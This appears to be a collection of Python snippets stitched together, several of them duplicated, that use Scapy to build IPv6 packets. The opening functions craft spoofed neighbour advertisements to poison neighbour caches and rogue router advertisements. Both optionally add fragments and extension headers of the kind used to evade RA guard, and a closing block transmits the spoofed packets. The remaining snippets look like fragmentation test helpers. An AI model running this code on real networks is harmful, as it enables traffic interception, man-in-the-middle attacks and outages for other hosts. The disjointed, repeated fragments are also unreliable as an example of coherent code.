def ncp(args):
""" Crafts a packet/packets that allow to poison NC """
if not args.srcmac:
args.srcmac = ni.ifaddresses(args.output)[ni.AF_LINK][0]['addr']
if not args.srcip:
for addr in ni.ifaddresses(args.output)[ni.AF_INET6]:
if addr['addr'].lower().startswith('fe80'):
args.srcip = addr['addr'][:-(len(args.output) + 1)] # Remove %interface from link-local address
p = Ether(src=args.srcmac, dst=args.dstmac)/IPv6(src=args.srcip, dst=args.dstip, hlim=255)
if args.frag:
p /= IPv6ExtHdrFragment()
if args.exthdrs:
for i in range(args.exthdrs):
p /= IPv6ExtHdrDestOpt()
p /= ICMPv6ND_NA(tgt=args.na[0], R=int(args.na[1]), S=int(args.na[2]), O=int(args.na[3]))
if args.lladdr:
p /= ICMPv6NDOptDstLLAddr(lladdr=args.lladdr)
if args.frag:
return fragment6(p, args.frag)
else:
return [p]
def rra(args):
""" Crafts (a) rogue router advertisment packet/packets """
if not args.srcmac:
args.srcmac = ni.ifaddresses(args.output)[ni.AF_LINK][0]['addr']
if not args.srcip:
for addr in ni.ifaddresses(args.output)[ni.AF_INET6]:
if addr['addr'].lower().startswith('fe80'):
args.srcip = addr['addr'][:-(len(args.output) + 1)] # Remove '%interface' from link-local address
p = Ether(src=args.srcmac, dst=args.dstmac)/IPv6(src=args.srcip, dst=args.dstip, hlim=255)
if args.frag:
p /= IPv6ExtHdrFragment()
if args.exthdrs:
for i in range(args.exthdrs):
p /= IPv6ExtHdrDestOpt()
p /= ICMPv6ND_RA(chlim=args.curhop, prf=args.preference, routerlifetime=args.lifetime, reachabletime=args.reachtime, retranstimer=args.retrtime)
if args.lladdr:
p /= ICMPv6NDOptSrcLLAddr(lladdr=args.lladdr)
if args.mtu:
p /= ICMPv6NDOptMTU(mtu=args.mtu)
if args.prefix:
p /= ICMPv6NDOptPrefixInfo(prefix=args.prefix[0], prefixlen=int(args.prefix[1]), L=int(args.prefix[2]), A=int(args.prefix[3]), R=int(args.prefix[4]), validlifetime=int(args.prefix[5]), preferredlifetime=int(args.prefix[6]))
if args.frag:
return fragment6(p, args.frag)
else:
return [p]
def generate_ip6_frags(self, payload_length, fragment_size):
p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length)
p_ip6 = IPv6(src="1::1", dst=self.pg0.remote_ip6)
outer_ip6 = (p_ether /
IPv6(src=self.pg1.remote_ip6, dst=self.pg0.local_ip6) /
IPv6ExtHdrFragment() / p_ip6 / p_payload)
frags = fragment6(outer_ip6, fragment_size)
p6_reply = (p_ip6 / p_payload)
p6_reply.hlim -= 1
return frags, p6_reply
def generate_ip6_frags(self, payload_length, fragment_size):
p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length)
p_ip6 = IPv6(src="1::1", dst=self.pg0.remote_ip6)
outer_ip6 = (p_ether / IPv6(src=self.pg1.remote_ip6,
dst=self.pg0.local_ip6) /
IPv6ExtHdrFragment() / p_ip6 / p_payload)
frags = fragment6(outer_ip6, fragment_size)
p6_reply = (p_ip6 / p_payload)
p6_reply.hlim -= 1
return frags, p6_reply
def craft(hdr, fl):
snd = []
rcv = {}
for fl in range(fl, fl+nbrFlux):
Utils.set_fl(hdr, fl)
sip = 'fc00:2:0:1::1' # Adresses don't rlly matter
dip = 'fc00:2:0:2::1'
packets_snd = fragment6(IPv6(src=sip, dst=dip) / IPv6ExtHdrFragment() / ICMPv6EchoRequest(data='A'*300), 100)
packets_snd = [pkt.__class__(str(hdr/pkt)) for pkt in packets_snd[:-1]] # remove last frag
snd.extend(packets_snd)
rcv = {}
return (snd, rcv)
def craft(hdr, fl):
snd = []
rcv = {}
for fl in range(fl, fl+nbrFlux):
Utils.set_fl(hdr, fl)
sip = 'fc00:2:0:1::1' # Adresses don't rlly matter
dip = 'fc00:2:0:2::1'
packets_snd = fragment6(IPv6(src=sip, dst=dip) / IPv6ExtHdrFragment() / ICMPv6EchoRequest(data='A'*300), 100)
packets_snd = [pkt.__class__(str(hdr/pkt)) for pkt in packets_snd]
packet_excepted = pkt.__class__(str(hdr/IPv6(src=sip, dst=dip) / ICMPv6EchoRequest(data='A'*300)))
snd.extend(packets_snd)
random.shuffle(snd) # shuffle
rcv[fl] = [packet_excepted]
return (snd, rcv)
try:
if not args.srcmac:
args.srcmac = ni.ifaddresses(args.interface)[ni.AF_LINK][0]['addr']
if not args.srcip:
for addr in ni.ifaddresses(args.interface)[ni.AF_INET6]:
if addr['addr'].lower().startswith('fe80'):
args.srcip = addr['addr'][:-(len(args.interface) + 1)] # Remove %interface from link-local address
p = Ether(src=args.srcmac, dst=args.dstmac)/IPv6(src=args.srcip, dst=args.dstip, hlim=255)
if args.frag:
p /= IPv6ExtHdrFragment()
if args.exthdrs:
for i in range(args.exthdrs):
p /= IPv6ExtHdrDestOpt()
p /= ICMPv6ND_NA(tgt=args.na[0], R=int(args.na[1]), S=int(args.na[2]), O=int(args.na[3]))
if args.lladdr:
p /= ICMPv6NDOptDstLLAddr(lladdr=args.lladdr)
if args.frag:
sendp(fragment6(p, args.frag), iface=args.interface)
else:
sendp(p, iface=args.interface)
except:
sys.stderr.write('Unable to send a packet\n')
